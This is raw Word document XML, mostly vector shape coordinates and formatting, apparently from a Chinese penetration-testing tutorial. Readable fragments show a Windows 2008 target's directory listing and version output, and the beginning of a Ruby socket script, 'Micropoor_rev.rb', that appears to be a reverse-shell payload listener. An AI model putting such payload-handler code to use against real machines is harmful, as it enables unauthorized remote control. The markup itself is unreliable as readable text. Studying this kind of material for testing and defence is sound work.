5,4148,1675,4146,1675,4144,1675,4141,1675,4139,1675,4136,1675,4134,1675,4131,1675,4129,1675,4126,1675,4123,1675,4121,1675,4118,1675,4115,1675,4112,1675,4109,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1675,4106,1674,4106,1674,4106,1674,4106,1674,4106,1674,4106,1674,4106,1674,4106,1673,4106,1673,4106,1673,4106,1673,4106,1672,4106,1672,4106,1672,4106,1672,4106,1671,4106,1671,4106,1670,4106,1670,4106,1669,4106,1669,4106,1668,4106,1668,4106,1667,4106,1667,4106,1666,4106,1665,4106,1664,4106,1664,4106,1663,4106,1662,4106,1661,4106,1660,4106,1659,4106,1658,4106,1657,4106,1656,4106,1655,4106,1654,4106,1652,4106,1651,4106,1650,4106,1648,4106,1647,4106,1645,4106,1644,4106,1642,4106,1640,4106,1639,4106,1637,4106,1635,4106,1633,4106,1631,4106,1629,4106,1627,4106,1625,4106,1623,4106,1621,4106,1618,4106,1616,4106,1613,4106,1611,4106,1608,4106,1606,4106,1603,4106,1600,4106,1597,4106,1594,4106,1591,4106,1588,4106,1585,4106,1582,4106,1579,4106,1575,4106,1572,4106,1568,4106,1564,4106,1561,4106,1557,4106,1553,4106,1549,4106,1545,4106,1541,4106,1537,4106,1532,4106,1528,4106,1523,4106,1519,4106,1514,4106,1509,4106,1505,4106,1500,4106,1495,4106,1489,4106,1484,4106,1479,4106,1473,4106,1468,4106,1462,4106,1456,4106,1451,4106,1445,4106,1439,4106,1432,4106,1426,4106,1420e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:228.500pt;margin-top:70.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4570,1410" coordsize="130,250">
        <v:shape style="position:absolute;left:4570;top:1410;width:130;height:250" coordorigin="4570,1410" coordsize="130,250" path="m4586,1420l4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4586,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4587,1420,4588,1420,4588,1420,4588,1420,4588,1420,4588,1420,4588,1420,4589,1420,4589,1420,4589,1420,4589,1420,4590,1420,4590,1420,4590,1420,4591,1420,4591,1420,4591,1420,4592,1420,4592,1420,4592,1420,4593,1420,4593,1420,4594,1420,4594,1420,4595,1420,4595,1420,4596,1420,4596,1420,4597,1420,4598,1420,4598,1420,4599,1420,4600,1420,4600,1420,4601,1420,4602,1420,4602,1420,4603,1420,4604,1420,4605,1420,4606,1420,4607,1420,4608,1420,4609,1420,4610,1420,4611,1420,4612,1420,4613,1420,4614,1420,4615,1420,4616,1420,4618,1420,4619,1420,4620,1420,4621,1420,4623,1420,4624,1420,4626,1420,4627,1420,4629,1420,4630,1420,4632,1420,4633,1420,4635,1420,4637,1420,4638,1420,4640,1420,4642,1420,4644,1420,4645,1420,4647,1420,4649,1420,4651,1420,4653,1420,4655,1420,4658,1420,4660,1420,4662,1420,4664,1420,4666,1420,4669,1420,4671,1420,4674,1420,4676,1420,4679,1420,4681,1420,4684,1420,4686,1420,4689,1420,4692,1420,4695,1420,4698,1420,4700,1420,4703,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1420,4706,1421,4706,1421,4706,1421,4706,1421,4706,1421,4706,1422,4706,1422,4706,1422,4706,1422,4706,1423,4706,1423,4706,1423,4706,1424,4706,1424,4706,1425,4706,1425,4706,1426,4706,1426,4706,1427,4706,1427,4706,1428,4706,1429,4706,1429,4706,1430,4706,1431,4706,1432,4706,1433,4706,1434,4706,1434,4706,1435,4706,1436,4706,1438,4706,1439,4706,1440,4706,1441,4706,1442,4706,1444,4706,1445,4706,1446,4706,1448,4706,1449,4706,1451,4706,1452,4706,1454,4706,1456,4706,1458,4706,1459,4706,1461,4706,1463,4706,1465,4706,1467,4706,1469,4706,1472,4706,1474,4706,1476,4706,1479,4706,1481,4706,1484,4706,1486,4706,1489,4706,1492,4706,1494,4706,1497,4706,1500,4706,1503,4706,1506,4706,1509,4706,1513,4706,1516,4706,1519,4706,1523,4706,1526,4706,1530,4706,1534,4706,1538,4706,1541,4706,1545,4706,1550,4706,1554,4706,1558,4706,1562,4706,1567,4706,1571,4706,1576,4706,1580,4706,1585,4706,1590,4706,1595,4706,1600,4706,1605,4706,1610,4706,1616,4706,1621,4706,1627,4706,1632,4706,1638,4706,1644,4706,1650,4706,1656,4706,1662,4706,1668,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4706,1675,4705,1675,4705,1675,4705,1675,4705,1675,4705,1675,4705,1675,4704,1675,4704,1675,4704,1675,4704,1675,4704,1675,4703,1675,4703,1675,4703,1675,4702,1675,4702,1675,4702,1675,4701,1675,4701,1675,4701,1675,4700,1675,4700,1675,4699,1675,4699,1675,4698,1675,4698,1675,4697,1675,4697,1675,4696,1675,4696,1675,4695,1675,4695,1675,4694,1675,4693,1675,4692,1675,4692,1675,4691,1675,4690,1675,4689,1675,4689,1675,4688,1675,4687,1675,4686,1675,4685,1675,4684,1675,4683,1675,4682,1675,4681,1675,4680,1675,4679,1675,4677,1675,4676,1675,4675,1675,4674,1675,4673,1675,4671,1675,4670,1675,4669,1675,4667,1675,4666,1675,4664,1675,4663,1675,4661,1675,4659,1675,4658,1675,4656,1675,4654,1675,4653,1675,4651,1675,4649,1675,4647,1675,4645,1675,4643,1675,4641,1675,4639,1675,4637,1675,4635,1675,4633,1675,4631,1675,4629,1675,4626,1675,4624,1675,4622,1675,4619,1675,4617,1675,4614,1675,4612,1675,4609,1675,4606,1675,4604,1675,4601,1675,4598,1675,4595,1675,4592,1675,4589,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1675,4586,1674,4586,1674,4586,1674,4586,1674,4586,1674,4586,1674,4586,1674,4586,1673,4586,1673,4586,1673,4586,1673,4586,1672,4586,1672,4586,1672,4586,1672,4586,1671,4586,1671,4586,1670,4586,1670,4586,1669,4586,1669,4586,1668,4586,1668,4586,1667,4586,1667,4586,1666,4586,1665,4586,1664,4586,1664,4586,1663,4586,1662,4586,1661,4586,1660,4586,1659,4586,1658,4586,1657,4586,1656,4586,1655,4586,1654,4586,1652,4586,1651,4586,1650,4586,1648,4586,1647,4586,1645,4586,1644,4586,1642,4586,1640,4586,1639,4586,1637,4586,1635,4586,1633,4586,1631,4586,1629,4586,1627,4586,1625,4586,1623,4586,1621,4586,1618,4586,1616,4586,1613,4586,1611,4586,1608,4586,1606,4586,1603,4586,1600,4586,1597,4586,1594,4586,1591,4586,1588,4586,1585,4586,1582,4586,1579,4586,1575,4586,1572,4586,1568,4586,1564,4586,1561,4586,1557,4586,1553,4586,1549,4586,1545,4586,1541,4586,1537,4586,1532,4586,1528,4586,1523,4586,1519,4586,1514,4586,1509,4586,1505,4586,1500,4586,1495,4586,1489,4586,1484,4586,1479,4586,1473,4586,1468,4586,1462,4586,1456,4586,1451,4586,1445,4586,1439,4586,1432,4586,1426,4586,1420e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:161.400pt;width:270.600pt;height:139.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:437.400pt;width:174.600pt;height:51.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:698.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,13970" coordsize="130,250">
        <v:shape style="position:absolute;left:2550;top:13970;width:130;height:250" coordorigin="2550,13970" coordsize="130,250" path="m2575,13981l2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2575,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2576,13981,2577,13981,2577,13981,2577,13981,2577,13981,2577,13981,2577,13981,2578,13981,2578,13981,2578,13981,2578,13981,2579,13981,2579,13981,2579,13981,2580,13981,2580,13981,2580,13981,2581,13981,2581,13981,2581,13981,2582,13981,2582,13981,2583,13981,2583,13981,2584,13981,2584,13981,2585,13981,2585,13981,2586,13981,2587,13981,2587,13981,2588,13981,2588,13981,2589,13981,2590,13981,2591,13981,2591,13981,2592,13981,2593,13981,2594,13981,2595,13981,2596,13981,2597,13981,2598,13981,2599,13981,2600,13981,2601,13981,2602,13981,2603,13981,2604,13981,2605,13981,2607,13981,2608,13981,2609,13981,2610,13981,2612,13981,2613,13981,2615,13981,2616,13981,2618,13981,2619,13981,2621,13981,2622,13981,2624,13981,2626,13981,2627,13981,2629,13981,2631,13981,2633,13981,2634,13981,2636,13981,2638,13981,2640,13981,2642,13981,2644,13981,2647,13981,2649,13981,2651,13981,2653,13981,2655,13981,2658,13981,2660,13981,2663,13981,2665,13981,2668,13981,2670,13981,2673,13981,2675,13981,2678,13981,2681,13981,2684,13981,2687,13981,2689,13981,2692,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13981,2695,13982,2695,13982,2695,13982,2695,13982,2695,13982,2695,13982,2695,13982,2695,13983,2695,13983,2695,13983,2695,13983,2695,13984,2695,13984,2695,13984,2695,13985,2695,13985,2695,13986,2695,13986,2695,13986,2695,13987,2695,13988,2695,13988,2695,13989,2695,13989,2695,13990,2695,13991,2695,13991,2695,13992,2695,13993,2695,13994,2695,13995,2695,13996,2695,13997,2695,13998,2695,13999,2695,14000,2695,14001,2695,14002,2695,14004,2695,14005,2695,14006,2695,14008,2695,14009,2695,14011,2695,14012,2695,14014,2695,14015,2695,14017,2695,14019,2695,14021,2695,14023,2695,14025,2695,14027,2695,14029,2695,14031,2695,14033,2695,14035,2695,14038,2695,14040,2695,14042,2695,14045,2695,14048,2695,14050,2695,14053,2695,14056,2695,14059,2695,14062,2695,14065,2695,14068,2695,14071,2695,14074,2695,14077,2695,14081,2695,14084,2695,14088,2695,14091,2695,14095,2695,14099,2695,14103,2695,14107,2695,14111,2695,14115,2695,14119,2695,14124,2695,14128,2695,14132,2695,14137,2695,14142,2695,14146,2695,14151,2695,14156,2695,14161,2695,14167,2695,14172,2695,14177,2695,14183,2695,14188,2695,14194,2695,14199,2695,14205,2695,14211,2695,14217,2695,14224,2695,14230,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2695,14236,2694,14236,2694,14236,2694,14236,2694,14236,2694,14236,2694,14236,2694,14236,2693,14236,2693,14236,2693,14236,2693,14236,2693,14236,2692,14236,2692,14236,2692,14236,2691,14236,2691,14236,2691,14236,2690,14236,2690,14236,2690,14236,2689,14236,2689,14236,2688,14236,2688,14236,2687,14236,2687,14236,2686,14236,2686,14236,2685,14236,2685,14236,2684,14236,2684,14236,2683,14236,2682,14236,2681,14236,2681,14236,2680,14236,2679,14236,2678,14236,2678,14236,2677,14236,2676,14236,2675,14236,2674,14236,2673,14236,2672,14236,2671,14236,2670,14236,2669,14236,2668,14236,2666,14236,2665,14236,2664,14236,2663,14236,2662,14236,2660,14236,2659,14236,2657,14236,2656,14236,2655,14236,2653,14236,2652,14236,2650,14236,2648,14236,2647,14236,2645,14236,2643,14236,2642,14236,2640,14236,2638,14236,2636,14236,2634,14236,2632,14236,2630,14236,2628,14236,2626,14236,2624,14236,2622,14236,2620,14236,2618,14236,2615,14236,2613,14236,2611,14236,2608,14236,2606,14236,2603,14236,2601,14236,2598,14236,2595,14236,2593,14236,2590,14236,2587,14236,2584,14236,2581,14236,2578,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14236,2575,14235,2575,14235,2575,14235,2575,14235,2575,14235,2575,14235,2575,14234,2575,14234,2575,14234,2575,14234,2575,14233,2575,14233,2575,14232,2575,14232,2575,14232,2575,14231,2575,14231,2575,14230,2575,14230,2575,14229,2575,14229,2575,14228,2575,14227,2575,14226,2575,14226,2575,14225,2575,14224,2575,14223,2575,14222,2575,14221,2575,14220,2575,14219,2575,14218,2575,14217,2575,14216,2575,14215,2575,14214,2575,14212,2575,14211,2575,14210,2575,14208,2575,14207,2575,14205,2575,14203,2575,14202,2575,14200,2575,14198,2575,14196,2575,14195,2575,14193,2575,14191,2575,14189,2575,14186,2575,14184,2575,14182,2575,14180,2575,14177,2575,14175,2575,14172,2575,14170,2575,14167,2575,14164,2575,14162,2575,14159,2575,14156,2575,14153,2575,14150,2575,14146,2575,14143,2575,14140,2575,14136,2575,14133,2575,14129,2575,14126,2575,14122,2575,14118,2575,14114,2575,14110,2575,14106,2575,14102,2575,14098,2575,14094,2575,14089,2575,14085,2575,14080,2575,14076,2575,14071,2575,14066,2575,14061,2575,14056,2575,14051,2575,14045,2575,14040,2575,14035,2575,14029,2575,14023,2575,14018,2575,14012,2575,14006,2575,14000,2575,13994,2575,13987,2575,1398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2019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23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15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DIR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Users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2017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12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13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03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25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DIR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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="89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个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="102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6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个目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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21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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>387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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>132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color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>928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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可用字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="9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15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96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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目标机位x64位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de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2008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331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8873" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="9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10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="11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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\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13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ver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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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Microsoft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Windows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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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6.1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.7600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]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0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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>置payload：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root@John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var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www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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="7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cat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./Micropoor_rev.rb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require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659800"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'socket'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0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if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ARGV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empty?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puts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"Usage:"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puts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"Micropoor.rb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port"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14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exit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9473" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="23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-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="30"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>end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8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7192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PORT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ARGV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first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to_i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def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dc4867"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handle_connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23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client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5421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puts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"Payload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is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on‐line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#{client}"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504.729pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,10094">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:10094" coordorigin="10402,0" coordsize="0,10094" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,10,10402,13,10402,16,10402,20,10402,24,10402,29,10402,34,10402,41,10402,47,10402,55,10402,63,10402,72,10402,82,10402,93,10402,105,10402,117,10402,131,10402,146,10402,161,10402,178,10402,196,10402,215,10402,235,10402,256,10402,279,10402,303,10402,328,10402,355,10402,383,10402,412,10402,443,10402,476,10402,510,10402,545,10402,583,10402,621,10402,662,10402,704,10402,748,10402,794,10402,842,10402,891,10402,943,10402,996,10402,1051,10402,1109,10402,1168,10402,1230,10402,1293,10402,1359,10402,1427,10402,1497,10402,1570,10402,1645,10402,1722,10402,1801,10402,1883,10402,1967,10402,2054,10402,2143,10402,2235,10402,2330,10402,2427,10402,2527,10402,2629,10402,2734,10402,2842,10402,2953,10402,3067,10402,3183,10402,3302,10402,3425,10402,3550,10402,3678,10402,3810,10402,3944,10402,4082,10402,4222,10402,4366,10402,4514,10402,4664,10402,4818,10402,4975,10402,5135,10402,5299,10402,5467,10402,5638,10402,5812,10402,5990,10402,6171,10402,6356,10402,6545,10402,6738,10402,6934,10402,7134,10402,7338,10402,7546,10402,7757,10402,7973,10402,8192,10402,8415,10402,8643,10402,8874,10402,9110,10402,9350,10402,9594,10402,9842,10402,10094e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:222.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,4450">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:4450" coordorigin="1490,970" coordsize="8990,445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1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1002,10484,1003,10484,1004,10484,1005,10484,1007,10484,1008,10484,1010,10484,1012,10484,1015,10484,1018,10484,1021,10484,1024,10484,1027,10484,1031,10484,1036,10484,1041,10484,1046,10484,1051,10484,1057,10484,1064,10484,1070,10484,1078,10484,1086,10484,1094,10484,1103,10484,1112,10484,1122,10484,1133,10484,1144,10484,1155,10484,1168,10484,1181,10484,1194,10484,1208,10484,1223,10484,1239,10484,1255,10484,1272,10484,1290,10484,1309,10484,1328,10484,1348,10484,1369,10484,1391,10484,1413,10484,1437,10484,1461,10484,1486,10484,1512,10484,1539,10484,1567,10484,1596,10484,1626,10484,1656,10484,1688,10484,1721,10484,1755,10484,1790,10484,1826,10484,1863,10484,1901,10484,1940,10484,1980,10484,2022,10484,2064,10484,2108,10484,2153,10484,2199,10484,2246,10484,2295,10484,2345,10484,2396,10484,2448,10484,2502,10484,2557,10484,2613,10484,2671,10484,2730,10484,2790,10484,2852,10484,2915,10484,2979,10484,3045,10484,3113,10484,3182,10484,3252,10484,3324,10484,3397,10484,3472,10484,3549,10484,3627,10484,3706,10484,3787,10484,3870,10484,3955,10484,4041,10484,4129,10484,4218,10484,4309,10484,4402,10484,4496,10484,4593,10484,4691,10484,4790,10484,4892,10484,4995,10484,5100,10484,5207,10484,5316,10484,5427,10484,5427,10484,5427,10484,5427,10484,5427,10484,5427,10484,5427,10483,5427,10482,5427,10482,5427,10480,5427,10479,5427,10477,5427,10475,5427,10473,5427,10470,5427,10466,5427,10462,5427,10458,5427,10453,5427,10448,5427,10442,5427,10435,5427,10428,5427,10419,5427,10411,5427,10401,5427,10391,5427,10379,5427,10367,5427,10354,5427,10340,5427,10326,5427,10310,5427,10293,5427,10275,5427,10256,5427,10236,5427,10215,5427,10192,5427,10168,5427,10143,5427,10117,5427,10090,5427,10061,5427,10031,5427,9999,5427,9966,5427,9931,5427,9895,5427,9858,5427,9819,5427,9778,5427,9735,5427,9691,5427,9646,5427,9598,5427,9549,5427,9498,5427,9445,5427,9391,5427,9334,5427,9275,5427,9215,5427,9153,5427,9088,5427,9022,5427,8953,5427,8883,5427,8810,5427,8735,5427,8658,5427,8578,5427,8497,5427,8413,5427,8326,5427,8238,5427,8146,5427,8053,5427,7957,5427,7859,5427,7758,5427,7654,5427,7548,5427,7439,5427,7328,5427,7214,5427,7097,5427,6977,5427,6855,5427,6730,5427,6602,5427,6471,5427,6337,5427,6201,5427,6061,5427,5918,5427,5773,5427,5624,5427,5472,5427,5317,5427,5159,5427,4997,5427,4833,5427,4665,5427,4494,5427,4319,5427,4141,5427,3960,5427,3776,5427,3587,5427,3396,5427,3201,5427,3002,5427,2800,5427,2594,5427,2385,5427,2172,5427,1955,5427,1734,5427,1510,5427,1510,5427,1510,5427,1510,5427,1510,5427,1510,5427,1510,5426,1510,5426,1510,5426,1510,5425,1510,5425,1510,5424,1510,5423,1510,5422,1510,5421,1510,5420,1510,5418,1510,5416,1510,5414,1510,5411,1510,5409,1510,5406,1510,5402,1510,5399,1510,5395,1510,5390,1510,5386,1510,5381,1510,5375,1510,5369,1510,5363,1510,5356,1510,5348,1510,5341,1510,5332,1510,5323,1510,5314,1510,5304,1510,5294,1510,5283,1510,5271,1510,5259,1510,5246,1510,5232,1510,5218,1510,5203,1510,5187,1510,5171,1510,5154,1510,5136,1510,5118,1510,5098,1510,5078,1510,5057,1510,5036,1510,5013,1510,4990,1510,4965,1510,4940,1510,4914,1510,4887,1510,4859,1510,4830,1510,4801,1510,4770,1510,4738,1510,4705,1510,4671,1510,4637,1510,4601,1510,4564,1510,4526,1510,4486,1510,4446,1510,4405,1510,4362,1510,4318,1510,4273,1510,4227,1510,4180,1510,4131,1510,4082,1510,4031,1510,3978,1510,3925,1510,3870,1510,3813,1510,3756,1510,3697,1510,3636,1510,3575,1510,3512,1510,3447,1510,3381,1510,3314,1510,3245,1510,3174,1510,3102,1510,3029,1510,2954,1510,2878,1510,2800,1510,2720,1510,2639,1510,2556,1510,2471,1510,2385,1510,2298,1510,2208,1510,2117,1510,2024,1510,1930,1510,1834,1510,1736,1510,1636,1510,1534,1510,1431,1510,1326,1510,1219,1510,1110,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:221.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,4430">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:4430" coordorigin="1490,990" coordsize="30,4430" path="m1517,999l1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1002,1517,1003,1517,1004,1517,1005,1517,1007,1517,1008,1517,1010,1517,1012,1517,1015,1517,1018,1517,1021,1517,1024,1517,1027,1517,1031,1517,1036,1517,1041,1517,1046,1517,1051,1517,1057,1517,1064,1517,1070,1517,1078,1517,1086,1517,1094,1517,1103,1517,1112,1517,1122,1517,1133,1517,1144,1517,1155,1517,1168,1517,1181,1517,1194,1517,1208,1517,1223,1517,1239,1517,1255,1517,1272,1517,1290,1517,1309,1517,1328,1517,1348,1517,1369,1517,1391,1517,1413,1517,1437,1517,1461,1517,1486,1517,1512,1517,1539,1517,1567,1517,1596,1517,1626,1517,1656,1517,1688,1517,1721,1517,1755,1517,1790,1517,1826,1517,1863,1517,1901,1517,1940,1517,1980,1517,2022,1517,2064,1517,2108,1517,2153,1517,2199,1517,2246,1517,2295,1517,2345,1517,2396,1517,2448,1517,2502,1517,2557,1517,2613,1517,2671,1517,2730,1517,2790,1517,2852,1517,2915,1517,2979,1517,3045,1517,3113,1517,3182,1517,3252,1517,3324,1517,3397,1517,3472,1517,3549,1517,3627,1517,3706,1517,3787,1517,3870,1517,3955,1517,4041,1517,4129,1517,4218,1517,4309,1517,4402,1517,4496,1517,4593,1517,4691,1517,4790,1517,4892,1517,4995,1517,5100,1517,5207,1517,5316,1517,5427e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:270.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5410" coordsize="8990,370">
